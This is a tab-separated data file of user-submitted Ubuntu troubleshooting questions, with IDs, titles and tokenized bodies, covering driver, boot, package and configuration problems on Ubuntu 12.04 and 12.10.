259762	i get a black screen after logging in	the cursor is still there though . startup is fine , it still gets to the login screen , but as soon as i press enter when i enter my password to log in , the screen turns black , and nothing happens . note ( if it helps ) : i just installed it , and have n't been able to log in yet , so it 's not a problem with software i installed . ( it 's 12.10 ) also , i installed it from a disc , not wubi .
259763	ubuntu copying file problem ( can not stat file )	i 've faced a problem when copying a file with the commands , cp ~/downloads/sample.pdf ~/desktop/ but the terminal gives me a message , cp : can not stat 'sample.pdf ' : no such file or directory .
259766	nvidia-settings problem	when i try to change resolution using nvidia-settings i get following error : how can i downgrade nvidia-settings without messing up my drivers .
259772	how to merge folders and subfolders ?	i have two folders ( original a and original b ) , and both do have subfolders . how do i merge these two folders ( and subfolders ) to destination c ? a ) original a and original b do have the same subfolders . i want to copy every unique file of any subfolder into the `` correct '' subfolder of destination c b ) some subfolders are only in original a , but not in original b. i want any folder in destination c does anyone know a terminal command ?
259774	is there a way to autostart a user session without logging in ?	i am administering a hybrid server/workstation using ubuntu 12.04 . there are several users that have access to the pc , and it is also working as a simplified fileserver using samba . this fileserver is associated to an account , which also has a dropbox account where certain folders are synchronized for remote ( outside the local network ) access . i would like that the `` server '' user session to be started automatically , but without logging in to the desktop . in other words , i would like that the first screen showed after booting is lightdm , but with one account already started ( and protected by a password ) . is it possible ? thank you .
259778	fan always running in dell inspiron 5520	i have dell inspiron 5520 laptop . its fan is always in running state . specifications os ubuntu 12.10 x64 cpu intel core i5 3rd gen video radeon 7670m . i have checked the system monitor to check cpu , then i found that one cpu uses is always 100 % . what do i need to do to stop the noise from my laptop ?
259779	cheese wo n't start : assertion 'cheese_is_camera_device ( device ) ' failed	cheese ( photobooth ) used to open just fine on my imac 12,2 running ubuntu 12.04 however it has stopped opening from either the launcher or terminal . i thought it might be due to running wmii but i logged into unity and ran it from the launcher and terminal and still no luck . the terminal output is : gtk-message : not loading module `` atk-bridge '' : the functionality is provided by gtk natively . please try to not load it . ( cheese:21704 ) : gtk-warning ** : attempting to add a widget with type gtkimage to a gtktogglebutton , but as a gtkbin subclass a gtktogglebutton can only contain one widget at a time ; it already contains a widget of type gtklabel ( cheese:21704 ) : gtk-warning ** : attempting to add a widget with type gtkimage to a gtktogglebutton , but as a gtkbin subclass a gtktogglebutton can only contain one widget at a time ; it already contains a widget of type gtklabel ( cheese:21704 ) : gtk-warning ** : attempting to add a widget with type gtkimage to a gtktogglebutton , but as a gtkbin subclass a gtktogglebutton can only contain one widget at a time ; it already contains a widget of type gtklabel ( cheese:21704 ) : gtk-warning ** : attempting to add a widget with type gtkimage to a gtkbutton , but as a gtkbin subclass a gtkbutton can only contain one widget at a time ; it already contains a widget of type gtklabel ( cheese:21704 ) : gtk-warning ** : attempting to add a widget with type gtkgrid to a gtktogglebutton , but as a gtkbin subclass a gtktogglebutton can only contain one widget at a time ; it already contains a widget of type gtklabel ( cheese:21704 ) : gtk-warning ** : attempting to add a widget with type gtkimage to a gtkbutton , but as a gtkbin subclass a gtkbutton can only contain one widget at a time ; it already contains a widget of type gtklabel ( cheese:21704 ) : gtk-critical ** : gtk_widget_set_no_show_all : assertion `gtk_is_widget ( widget ) ' failed ( cheese:21704 ) : gtk-critical ** : gtk_widget_show_all : assertion `gtk_is_widget ( widget ) ' failed libv4l2 : error getting pixformat : invalid argument ** ( cheese:21704 ) : critical ** : cheese_camera_device_get_uuid : assertion `cheese_is_camera_device ( device ) ' failed segmentation fault this leads me to think the last line is what is causing it to not start up but i have no clue . i have tried removing with `` sudo apt-get -- purge remove cheese '' and then reinstalling but it still crashes on start-up . the webcam still works because when i use 'guvcview ' the webcam shows up just fine .
259784	64bit chroot on 64bit host	the host is a ubuntu 12.04 64-bit installation . i 'm using schroot to run chroots for several different linux systems , such as ubuntu 10.04 i386 . the files for the chroots stem from working virtualboxes and are rsynced to my host . this setup works perfectly fine for all i386 chroots i have . but ubuntu 12.04 amd64 does not work . any command i try to execute via schroot reports this : e : failed to execute âsome_commandâ : no such file or directory the original system i 'm trying to chroot into works without problems ( in its virtualbox ) . is there something special that needs to be set-up for 64bit chroots ? again , my host is a 64bit linux , so this not the usual problem with 32bit hosts trying to chroot into a 64bit installation .
259785	where does lxrandr save its display configurations ?	it looks like lxrandr can save configurations . but where are they saved and in what form ? ( i was thinking about activating them by shortkey . )
259788	any way to backup apt-get update	i am using ubuntu 11.10 lts . whenever i screw up my system , i want to restore it using live cd . but apt-get update takes long time.my internet connection is poor . any way to backup those apt-get updates and install them in new os ?
259793	lvm encryption : how does it work ?	i set up lvm partitions on debian ( which is the same as doing it on ubuntu ) . how does it impact performance and how secure is it ? do i need to have access to the console when it reboots to provide the decryption key ? i 'm confused .
259794	does ubuntu support the cdma version of the galaxy nexus ?	looking at the list of supported devices , i see that gsm galaxy nexus devices ( takju and yakju ) are supported but nothing about the cdma ( toro/verizon or toroplus/sprint ) versions of the galaxy nexus . are these devices ( toro and toroplus ) so very different from takju or yakju ( other than radios ) ? will i be able to flash ubuntu touch to a toro or toroplus device ? thank you for your input .
259797	install package to specific location	i want to install steam for linux . as i have only 256gb ssd and not enough space for games , i 'd like to install it ( and all it 's games ) to a usb3 flash drive . how to do that ? preferably using sudo apt-get install **** . have n't find a way to specify the installation location .
259808	shell script , read is not waiting with ssh	hi all i am new to shell scripting and please help me in this situation . i have created a shell script named ./remote1 which looks like below . # ./remote1 file ssh username @ x.x.x.x 'bash -s ' < ./createdir here 'createdir ' is another file i had created which is given below # ./createdir file echo `` give directory name '' read name mkdir ~/ $ name if i run the ./createdir alone in my machine , it will execute without any problem . if i execute ./remote1 , it will not wait for input the data for the 'read ' command.please anyone could help me to solve this problem . thanks in advance .
259816	how can i change gtk3 themes from xfce or openbox ?	running ubuntu 12.10 , the problem i 'm having is that when running xfce or openbox as my desktop i can not seem to switch the gtk theme away from the default ambiance . i 've tried gtk-theme-switch , lxappearance and several others to no avail . no matter what i do the gtk apps keep their ambiance theme . i even tried logging into the regular unity desktop and changing it from there with the tweak tool but when i log back into a different desktop everything is still using ambiance . this is crazy , there must be a way to change them .
259819	why ca n't i run java web start applications ?	i have ubuntu 12.10 for x86-64 on my pc and i 'm trying to run a .jnlp file . i 've installed java 7 and the java plugin for mozilla firefox manually ( because there is no .deb package for java 7 for ubuntu ) . whenever i double click a .jnlp file , firefox is opened and it gives me the option of opening the file with firefox or saving it , if i click save it download the file i 'm trying to run and if i click open with firefox web browser it opens another tab and asks me again ( in the new tab ) to either open or save . i used to run the exact same file on debian , so what should i do to run this file on ubuntu ?
259822	why i am getting a black screen when trying to log into e17 ?	normal 12.10 install , i installed e17 via the console sudo apt-get install e17 it works fine on my vm install of ubuntu 12.10 running on my mac , but on my laptop it just stops at a black screen with a mouse cursor . how can i get e17 going ?
259823	installing jekyll with gem	im using ubunto 12.04 i am trying to install jekyll through gem with sudo gem install jekyll but i get this error at some point of the installation : error : while generating documentation for jekyll-0.12.1 ... message : unhandled special : special : type=17 , text= '' < ! -- more -- > '' ... rdoc args : -- ri -- op /usr/lib/ruby/gems/1.8/doc/jekyll-0.12.1/ri -- charset=utf-8 lib readme.textile license -- title jekyll-0.12.1 documentation -- quiet
259824	dual boot windows 8 and ubuntu 12.10 grub error	i recently purchased a new hp laptop with windows 8 pre-installed in it . then i installed ubuntu 12.10 from a bootable usb-stick . now when i restarted my laptop , instead of showing grub menu in which i have choices to pick which os to run , it straightaway booted windows . then again i inserted usb with ubuntu 12.10 in it , and ran boot-recovery software . it gave me this url . now when i restarted , grub menu was displayed , and i could run ubuntu from it . but when i chose windows 8 from the menu , i got an error that it could not find some efi file and returned to grub menu . then again i inserted usb , ran boot-recovery software , and restarted , and it gave me this url , but this time , it did n't even shown grub menu , it straight booted the windows 8 . i do n't know what to do so that grub menu is proper and i could boot both os . i have spent whole day on searching and trying various things , but i did n't get the expected results . also , while searching on net , i found this some uefi issue ( i do n't know about it technically ) . so is it windows 8 problem or hardware problem ? if i install windows 7 , then can i properly install ubuntu 12.10 on that ?
259825	starting ubuntu mobile development in windows pc	i am an android developer and i want to contribute to ubuntu community by developing apps . i use windows pc as a workstation ( sorry for that ) . please guide me to anything useful so that i can start development with minimum configuration problem . in short , how can i start ubuntu mobile app development in already set up eclipse environment ? and does ubuntu mobile support all javase packages ? any answer to any direction will be helpful . thanks
259829	ubuntu 12.04 ssh works from terminal , but not from gnome	i have two ubuntu boxes set up : one running 12.04 server and one running the standard desktop version of 12.04 . i can ssh into my server computer from my desktop using terminal ( using ssh spin @ 192.168.0.xxx -p 22 ) , but when i try to do the same thing from my gnome desktop ( using 'file > connect to server ' ) i immediately get `` connection refused by server '' . in the dialog box i use the same port number ( 22 ) , the same user ( spin ) , the same ip address and select 'ssh ' . i leave the 'folder ' option as '/ ' . what am i missing ?
259832	determine which version of a gem is installed ?	is there a way via cli to determine which version number of a gem is installed on my machine ? similar to yolk -l for python ? i 'm trying to see if i have the latest version of compass / sass / zurb foundation . i have a dependency that requires a particular version number . so i need to see what version it is .
259836	how to stop cron from mailing me ?	i have setup a ssmtp server with my gmail username and password . after that i have been getting constant emails from my laptop to my gmail . here the mails . the first one is somewhat like this : the subject is cron [ -x /usr/lib/php5/maxlifetime ] & & [ -d /var/lib/php5 ] & & find /var/lib/php5/ -depth -mindepth 1 -maxdepth 1 -type f -ignore_readdir_race -cmin + $ ( /usr/lib/php5/maxlifetime ) ! -execdir fuser -s { } 2 > /dev/null \ ; -delete the sender is root the body of the text is php warning : php startup : unable to load dynamic library '/usr/lib/php5/20100525/msql.so ' - /usr/lib/php5/20100525/msql.so : can not open shared object file : no such file or directory in unknown on line 0 the second mail is : subject : anacron job 'cron.daily ' on innovator body is : /etc/cron.daily/logrotate : apache2 : could not reliably determine the server 's fully qualified domain name , using 127.0.1.1 for servername /etc/cron.daily/update-notifier-common : flashplugin-installer : downloading http : //archive.canonical.com/pool/partner/a/adobe-flashplugin/adobe-flashplugin_11.2.202.270.orig.tar.gz installing from local file /tmp/tmphjhyvl.gz flash plugin installed . when i look in /etc/cron.d there are two files : anacron php5 the contents of php5 are as follows . # /etc/cron.d/php5 : crontab fragment for php5 # this purges session files older than x , where x is defined in seconds # as the largest value of session.gc_maxlifetime from all your php.ini # files , or 24 minutes if not defined . see /usr/lib/php5/maxlifetime # look for and purge old sessions every 30 minutes 09,39 * * * * root [ -x /usr/lib/php5/maxlifetime ] & & [ -d /var/lib/php5 ] & & find /var/lib/php5/ -depth -mindepth 1 -maxdepth 1 -type f -ignore_readdir_race -cmin + $ ( /usr/lib/php5/maxlifetime ) ! -execdir fuser -s { } 2 > /dev/null \ ; -delete the contents of anacron filea are as follows : # /etc/cron.d/anacron : crontab entries for the anacron package shell=/bin/sh path=/usr/local/sbin : /usr/local/bin : /sbin : /bin : /usr/sbin : /usr/bin 30 7 * * * root start -q anacron || : i have also tried adding the string > /dev/null 2 > & 1 at the end of the php file ( as described here ) but still i get the mails . how do i stop from getting the mails .
259839	how do i know if my web camera is linked to ubuntu ?	ubuntu 12.04 . i own a samsung nc10 , with a 1.3 mega pixel integrated digital motion camera . ( that i copied from the specs page . ) but how do i know if it 's linked up ? ( can i use a program or something ? ) if so , what if it 's not linked up ? how can i link it up ? sorry for the multiple questions , but my web camera is quite important as i might get skype . any help appreciated . thanks .
259842	sendmail no response	i 'm using postfix on ubuntu 12.04 server , with help from https : //help.ubuntu.com/community/postfix after setting up sasl as above guide , i tried sendmail - and sendmail just hangs . here 's what i 've done : # cat mail.mail to : < myid > @ gmail.com subject : test mail from : root @ < myserver.com > a test mail # sendmail -vt mail.mail ( a blank line displayed forever and i have to ctrl+c out of it ) though i can send mail via telnet . # telnet localhost 25 ehlo < myserver.com > mail from : root @ < myserver.com > rcpt to : < myid > @ gmail.com data test mail . ( mail sent to < myid > @ gmail.com , thrown directly to junks though )
259846	remap broken keys : ca n't use lxkeymap or xev	problem i have a hardware problem and i need a software fix . a couple of weeks ago , the m , , , . , and enter buttons on my keyboard ( us-layout ) stopped working . could be keyboard , but probably signs of a dying motherboard . as my car just died and i 'm about to move across the country to start grad school , i 'm going to try to squeeze out every drop of remaining functionality i can out of this laptop . also , learning to remap keys is a good learning opportunity for me . objective so , i would like to remap the keys above to [ , ] , \ , and caps lock , respectively . specs ubuntu precise ( gnome classic-no effects ) and/or lubuntu on a dell d630 latitude tried already 1 . tried to use lxkeymap to remap caps lock to enter . unfortunately , the keyboard options do not appear to be selectable when i mouse over and click the boxes in front of them or highlight them and select enter using onboard . also , there does not appear to be a preset for remapping the other keys . 2 . other suggestions in the forums recommended using xev to identify the properties of the keys . unfortunately , when the keys are broken , xev naturally does not output any info when they are pressed . does anyone have any suggestions about how to go about remapping these keys ? thank you !
259847	installing ubuntu server and it is stuck at `` configuring apt ''	i am installing ubuntu server 12.04.2 lts 64bit . everything is fine up until it gets to `` configuring apt '' and it is stuck at `` retrieving file 61 of 69 '' . i left it on for 6 hours now and is still stuck at that same point . i have tried restarting the installation with network cable disconnected , i have tried skipping this step by clicking the only available button `` cancel '' but then it fails later in the process . ( i ca n't remember where ) some people said to try and open another terminal ctrl-alt-f2 and do `` ifconfig eth0 down '' but when i tried that it says `` ifconfig '' is not a command ... nothing really works actually , not even `` man '' .
259850	how to get past `` sending 'system ' ( 92311 kb ) ... '' when installing ubuntu on nexus 7	i 'm in the process of installing the ubuntu image onto my nexus 7 following these directions . i am on the step 4 and typed in phablet-flash -b and it downloaded some files , erased 'system ' and is now on sending 'system ' ( 92311 kb ) ... however , it has been on this step for about 3 hours now . i am assuming it should n't take this long so how can i go about getting out of this and restarting the flash without bricking my device ?
259856	terminal vim colours broken on focuslost	my vim setup uses the csexact plugin to fix match the colors for color schemes that would normally only work in gvim . everything works fine until gnome-terminal loses focus , and suddenly everything breaks ! here is an image of issue in action : i have the exact same vim setup on my laptop ( ubuntu 12.04 32bit , gnome-terminal 3.4.1.1 , vim compiled from source ) . however , on my pc ( ubuntu 12.10 64bit , gnome-terminal 3.6.0 , vim compiled from source ) , this issue occurs . i hesitate to blame the csexact plugin , since vim in gnome-terminal can not receive focuslost or focusgained events , this must be a terminal issue then ; however i do notice that when the colors break if i run : csexactcolors everything fixes again . what can i do ? any ideas on how to fix this , what the issue is , or even a workaround ? thanks
259859	libqt4-dev can not be installed and breaks package manager	my qtcreator was not working properly and was missing things like examples , tutorials etc . so i basically decided to do a clean install of all qt5 packages . i ppa-purge the official ubuntu-sdk ppa and tried to reinstall everything . i added the 2 ppa mentioned in developer.ubuntu.com . i installed qtcreator and now it all works . however when i tried to update my 12.04 system , i now see the error message that there is an unmet dependency . on running sudo apt-get dist-upgrade i get the following error output , reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : libqt4-opengl-dev : depends : libqt4-dev ( = 4:4.8.1-0ubuntu4.4 ) but it is not installed libqtwebkit-dev : depends : libqt4-dev ( > = 4:4.8.0~ ) but it is not installed e : unmet dependencies . try using -f. so it seems that libqt4-dev is not installed . i try installing it based on the error message by sudo apt-get -f install libqt4-dev . but then i get this error message , reading package lists ... done building dependency tree reading state information ... done suggested packages : libmysqlclient-dev libpq-dev libsqlite3-dev unixodbc-dev the following new packages will be installed : libqt4-dev 0 upgraded , 1 newly installed , 0 to remove and 0 not upgraded . 39 not fully installed or removed . need to get 0 b/2,516 kb of archives . after this operation , 18.0 mb of additional disk space will be used . ( reading database ... 416905 files and directories currently installed . ) unpacking libqt4-dev ( from ... /libqt4-dev_4 % 3a4.8.1-0ubuntu4.4_i386.deb ) ... dpkg : error processing /var/cache/apt/archives/libqt4-dev_4 % 3a4.8.1-0ubuntu4.4_i386.deb ( -- unpack ) : trying to overwrite '/usr/bin/uic3 ' , which is also in package qtchooser 0.0.1~git20121229.g8f08405-0ubuntu1~precise1~test5 dpkg-deb ( subprocess ) : subprocess data was killed by signal ( broken pipe ) dpkg-deb : error : subprocess < decompress > returned error exit status 2 errors were encountered while processing : /var/cache/apt/archives/libqt4-dev_4 % 3a4.8.1-0ubuntu4.4_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) how do i fix this ? [ edit 1 ] : in response to asclepix 's anser , i tried removing qtchooser by sudo apt-get remove qtchooser , however the output i get is , reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : libqt4-opengl-dev : depends : libqt4-dev ( = 4:4.8.1-0ubuntu4.4 ) but it is not going to be installed libqtwebkit-dev : depends : libqt4-dev ( > = 4:4.8.0~ ) but it is not going to be installed qt5-default : depends : qtchooser but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) .
259861	major issues trying to clean up /boot	12.04 lts here , first off let me start with a uname -a output for you 3.2.0-35-generic-pae # 55-ubuntu smp wed dec 5 18:04:39 utc 2012 i686 i686 i386 gnu/linux so my boot partition was at 100 % . a huge no-no , so i wanted to clean it up in order for me to upgrade vmware tools on this machine . i ran the usual dpkg -l 'linux-* ' | sed '/^ii/ ! d ; / ' '' $ ( uname -r | sed `` s/\ ( . *\ ) -\ ( [ ^0- 9 ] \+\ ) /\1/ '' ) '' '/d ; s/^ [ ^ ] * [ ^ ] * \ ( [ ^ ] *\ ) . */\1/ ; / [ 0-9 ] / ! d ' | xargs sudo apt-get -y purge however when i try that i kept getting issues about unmet dependencies.. reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : linux-generic : depends : linux-headers-generic ( = 3.2.0.37.44 ) but 3.2.0.38.46 is to be installed linux-headers-generic : depends : linux-headers-3.2.0-38-generic but it is not going to be installed linux-image-generic : depends : linux-image-3.2.0-37-generic but it is not going to be installed linux-image-generic-pae : depends : linux-image-3.2.0-37-generic-pae but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . if i tried to install anything of course it would fail with not enough space left on /boot . so i moved some older kernels to /tmp for the time being . here is my /tmp drwxr-xr-x 2 root root 4096 jan 14 19:34 hsperfdata_root -rw-r -- r -- 1 root root 7906868 may 29 2012 initrd.img-2.6.28-19-server.old.0 -rw-r -- r -- 1 root root 17083030 oct 26 10:57 initrd.img-3.2.0-27-generic -rw-r -- r -- 1 root root 17096219 oct 26 11:00 initrd.img-3.2.0-27-generic-pae -rw-r -- r -- 1 root root 17085508 dec 31 08:20 initrd.img-3.2.0-33-generic -rw-r -- r -- 1 root root 17099160 dec 31 08:20 initrd.img-3.2.0-33-generic-pae -rw-r -- r -- 1 root root 17091480 dec 31 08:23 initrd.img-3.2.0-34-generic drwxr-xr-x 10 root root 4096 feb 22 11:07 mkinitramfs_lztuqq -rw -- -- -- - 1 root root 0 feb 22 11:07 mkinitramfs-ol_lnbawl -rw -- -- -- - 1 root root 2249889 jul 6 2012 system.map-3.2.0-27-generic -rw -- -- -- - 1 root root 2311276 jul 6 2012 system.map-3.2.0-27-generic-pae -rw -- -- -- - 1 root root 2251905 oct 18 13:27 system.map-3.2.0-33-generic -rw -- -- -- - 1 root root 2313292 oct 18 13:41 system.map-3.2.0-33-generic-pae -rw -- -- -- - 1 root root 2252451 nov 15 07:04 system.map-3.2.0-34-generic -rw -- -- -- - 1 root root 4855808 jul 6 2012 vmlinuz-3.2.0-27-generic -rw -- -- -- - 1 root root 5010688 jul 6 2012 vmlinuz-3.2.0-27-generic-pae -rw -- -- -- - 1 root root 4861280 oct 18 13:27 vmlinuz-3.2.0-33-generic -rw -- -- -- - 1 root root 5015328 oct 18 13:41 vmlinuz-3.2.0-33-generic-pae -rw -- -- -- - 1 root root 4862688 nov 15 07:04 vmlinuz-3.2.0-34-generic drwx -- -- -- 2 root root 4096 jan 14 19:34 vmware-root so now i try to aptitude safe-upgrade to see if it will fix the issues with the kernels and it did seem to install 3.2.0-38 but 3.2.0-37 is just not in /boot so i think that 's the issue . here is what is in my boot ( 49 % used after moving those to /tmp and now % 69 used after aptitude safe-upgrade ) . -rw-r -- r -- 1 root root 795776 jul 6 2012 abi-3.2.0-27-generic -rw-r -- r -- 1 root root 800453 jul 6 2012 abi-3.2.0-27-generic-pae -rw-r -- r -- 1 root root 797027 oct 18 13:27 abi-3.2.0-33-generic -rw-r -- r -- 1 root root 801704 oct 18 13:41 abi-3.2.0-33-generic-pae -rw-r -- r -- 1 root root 797082 nov 15 07:04 abi-3.2.0-34-generic -rw-r -- r -- 1 root root 797121 dec 5 13:52 abi-3.2.0-35-generic -rw-r -- r -- 1 root root 801798 dec 5 14:06 abi-3.2.0-35-generic-pae -rw-r -- r -- 1 root root 797231 jan 8 17:48 abi-3.2.0-36-generic -rw-r -- r -- 1 root root 801908 jan 8 18:03 abi-3.2.0-36-generic-pae -rw-r -- r -- 1 root root 797340 feb 19 08:29 abi-3.2.0-38-generic -rw-r -- r -- 1 root root 802017 feb 19 08:44 abi-3.2.0-38-generic-pae -rw-r -- r -- 1 root root 147463 jul 6 2012 config-3.2.0-27-generic -rw-r -- r -- 1 root root 147401 jul 6 2012 config-3.2.0-27-generic-pae -rw-r -- r -- 1 root root 147497 oct 18 13:27 config-3.2.0-33-generic -rw-r -- r -- 1 root root 147435 oct 18 13:41 config-3.2.0-33-generic-pae -rw-r -- r -- 1 root root 147514 nov 15 07:04 config-3.2.0-34-generic -rw-r -- r -- 1 root root 147514 dec 5 13:52 config-3.2.0-35-generic -rw-r -- r -- 1 root root 147452 dec 5 14:06 config-3.2.0-35-generic-pae -rw-r -- r -- 1 root root 147514 jan 8 17:48 config-3.2.0-36-generic -rw-r -- r -- 1 root root 147452 jan 8 18:03 config-3.2.0-36-generic-pae -rw-r -- r -- 1 root root 147497 feb 19 08:29 config-3.2.0-38-generic -rw-r -- r -- 1 root root 147435 feb 19 08:44 config-3.2.0-38-generic-pae drwxr-xr-x 3 root root 5120 feb 22 11:25 grub -rw-r -- r -- 1 root root 17092973 dec 31 10:09 initrd.img-3.2.0-35-generic -rw-r -- r -- 1 root root 17101417 dec 31 10:09 initrd.img-3.2.0-35-generic-pae -rw-r -- r -- 1 root root 17093970 jan 18 06:52 initrd.img-3.2.0-36-generic -rw-r -- r -- 1 root root 17103977 jan 18 06:52 initrd.img-3.2.0-36-generic-pae -rw-r -- r -- 1 root root 17090717 feb 22 11:23 initrd.img-3.2.0-38-generic -rw-r -- r -- 1 root root 17098330 feb 22 11:25 initrd.img-3.2.0-38-generic-pae drwxr-xr-x 2 root root 12288 jul 2 2009 lost+found -rw-r -- r -- 1 root root 176764 nov 27 2011 memtest86+.bin -rw-r -- r -- 1 root root 178944 nov 27 2011 memtest86+_multiboot.bin -rw -- -- -- - 1 root root 2252128 dec 5 13:52 system.map-3.2.0-35-generic -rw -- -- -- - 1 root root 2314162 dec 5 14:06 system.map-3.2.0-35-generic-pae -rw -- -- -- - 1 root root 2252687 jan 8 17:48 system.map-3.2.0-36-generic -rw -- -- -- - 1 root root 2314721 jan 8 18:03 system.map-3.2.0-36-generic-pae -rw -- -- -- - 1 root root 2253664 feb 19 08:29 system.map-3.2.0-38-generic -rw -- -- -- - 1 root root 2315698 feb 19 08:44 system.map-3.2.0-38-generic-pae -rw -- -- -- - 1 root root 4863712 dec 5 13:52 vmlinuz-3.2.0-35-generic -rw -- -- -- - 1 root root 5017984 dec 5 14:06 vmlinuz-3.2.0-35-generic-pae -rw -- -- -- - 1 root root 4864480 jan 8 17:48 vmlinuz-3.2.0-36-generic -rw -- -- -- - 1 root root 5019456 jan 8 18:03 vmlinuz-3.2.0-36-generic-pae -rw -- -- -- - 1 root root 4864128 feb 19 08:29 vmlinuz-3.2.0-38-generic -rw -- -- -- - 1 root root 5018240 feb 19 08:44 vmlinuz-3.2.0-38-generic-pae no matter what i do i just cant clean out old kernels the proper way . it always gives me a dependency error and suggests to try apt-get-f install . well even apt-get -f install gives me errors . reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : linux-generic linux-image-generic linux-image-generic-pae the following packages will be upgraded : linux-generic linux-image-generic linux-image-generic-pae 3 upgraded , 0 newly installed , 0 to remove and 1 not upgraded . 4 not fully installed or removed . need to get 0 b/6,944 b of archives . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y dpkg : dependency problems prevent configuration of linux-image-generic : linux-image-generic depends on linux-image-3.2.0-37-generic ; however : package linux-image-3.2.0-37-generic is not installed . dpkg : error processing linux-image-generic ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of linux-generic : linux-generic depends on linux-image-generic ( = 3.2.0.37.44 ) ; however : package linux-image-generic is not configured yet . linux-generic depends on linux-headers-generic ( = 3.2.0.37.44 ) ; however : version of linux-headers-generic on system is 3.2.0.38.46. dpkg : error processing linux-generic ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of linux-image-generic-pae : linux-image-generic-pae depends on linux-image-3.2.0-37-generic-pae ; however : package linux-image-3.2.0-37-generic-pae is not installed . dpkg : error processing linux-image-generic-pae ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of linux-image-server : linux-image-server depends on linux-image-generic-pae ; however : package linux-image-generic-pae is not configured yet . dpkg : error processing linux-image-server ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already errors were encountered while processing : linux-image-generic linux-generic linux-image-generic-pae linux-image-server e : sub-process /usr/bin/dpkg returned an error code ( 1 ) no matter what i try it keeps referencing those liux images /kernels . please help !
259864	ruby select ! method missing after latest update	when i tried to run some code after yesterday 's update to ruby 1.9 , i got this error : undefined method `select ! ' for [ `` 58720262 '' ] : array ( nomethoderror ) i got the same error when i tried it in irb . does anyone know how i can get this method back ? is there a library i can downgrade or something ? thanks !
259868	swap memory problems	i deleted my 16 gigabytes swap memory and now it is unallocated space . how can i join that space with the other 484 gigabytes ? screenshot : btw i can not shutdown after removing that memory . what are the logs i can look at to see what 's going on ?
259872	problems with windows 8 installation	i 've followed all the instructions and when i get to dual screen boot i choose ubuntu and i receive a message : 1 . insert windows installation disc and restart . 2 . choose language end then press next . 3 . preess restore device . if you do n't have this disc get in touch with system administrator or the manufacturer . info : there 's a file missing or it contained an error which is preventing from booting the os . enter= os selection esc uefi configuration please help me on what to do to complete the installation . thanks
259876	ubuntu dictation / transcription software	i know that similar questions have been asked before , but the answers are either irrelevant or outdated . i 'm wondering if anyone knows of a a good program for ubuntu that would allow me to manually transcribe interviews while listening to audio . when i used windows , i was able to use the sony digital voice editor , and i never needed to leave my word processor to stop the audio . that 's the kind of functionality i 'm looking for . i do n't want a speech-to-text program , which would be useless for the multilingual interviews i 'm transcribing . audacity seems to not have macros that i can use to just pause and rewind without clicking on the window itself . transcriber , a software recommended in other threads , seems to be wholly non-functional and has n't been updated in a long time . after it is installed it is unusable . any other recommendations ?
259879	how can i get the correct spanish keyboard layout ?	i 'm running ubuntu 12.04 and i ca n't seem to get the right spanish keyboard layout . i 'm used to using the windows spanish ( international ) layout with dead keys on the us apostrophe and open bracket , as well as a ç where the us layout has a \ . the dead keys i 'm used to are an acute accent ( ´ ) where ' is , a diæresis/ '' umlaut '' ( ¨ ) where the `` is , a grave accent ( ` ) where the [ is , and a circumflex ( ^ ) where the { is . i am also used to having ° where the ` is . the keyboard layout that i have also does not allow me to type @ , # , or any of the other characters that i am used to typing by pressing ctrl + alt + ( key ) . the previews of keyboard layouts included with ubuntu are unhelpful and confusing to me . can anyone help me find or construct the keyboard layout i 'm looking for ?
259880	can i setup an smtp server with ubuntu desktop ?	i want to run an smtp server that will distribute email alerts from various servers .
259881	constant crashes from ubuntu 12.10 amd	i am getting constant crashes whenever i try to install , use , view video , firefox , compiz etc from ubuntu 12.10 amd , or 12.04.02 . system : amd 64bit athlon , x2 core geforce 7900 gs 512mb ddr3 standard memory : teamelite ddr ii , 800mhz 2x1gb m/b : asrock alive dual esata ii what could be the problem ? br
259882	can i specify packages to be upgraded ?	can i choose which packages i want to upgrade with apt ? using apt-get upgrade upgrades all packages , not just some of them . using apt-get install package does n't upgrade some by me required packages which are related to the specified package . example : when i type sudo apt-get install firefox , packages like firefox-locale-en still using previous package version .
259884	driver trouble with my bcm4331 on my macbook pro 9 2	i 've finally gotten my wifi working on my macbook pro 9 2 ( fully booted with ubuntu 12.04 64-bit ) , but it is only working on the broadcom sta/wl driver that comes with this version of ubuntu . i 've been all over the forums on the web and i 've gathered that this driver does n't support monitor mode , but the b43 driver that is already installed on my computer does . 03:00.0 network controller : broadcom corporation bcm4331 802.11a/b/g/n ( rev 02 ) i 've tried : rmmod -r wl rmmod -r b43 modprobe b43 and also tried blacklisting the wl driver . all it does is completely ignores the fact that i can use wireless . no `` firmware missing '' or anything like that . it 's just not there . i know that b43 supports the bcm4331 card i have , but it is n't . this is all the information i can think to give , but of course if i have left anything useful out just tell me . thanks !
259892	gsettings not updating correctly	on the very latest 12.10 , if i automate a background image change using gsettings , although the command executes with success , the image is `` stuck '' on the old one . if i open the appearance system settings , then there is a `` refresh '' and the image is updated . i am doing this with udev rules for pluging in monitors , but it also happens if i call the commands from the terminal directly . example of the commands : gsettings set org.gnome.desktop.background picture-uri 'file : //fileuri.jpg' gsettings set org.gnome.desktop.background picture-options 'zoom' has anything changed to ( presumably ) nautilus , which would require me to kill it , or notify it of the change via dbus ? ! ? !
259893	how do i put a graphics driver into use ?	i just installed the experimental ( version 310 ) proprietary nvidia driver for nvidia geforce gtx 550ti card . for some reason , the gui did not come up , so i did it entirely through the terminal , using the jockey-text utility as described here . how can i put the driver into use ? jockey-text -- list outputs the following : kmod : nvidia_experimental_310 - nvidia_experimental_310 ( proprietary , enabled , not in use ) i assume the 'enabled ' part means the kernel module is enabled ; how can i use it ?
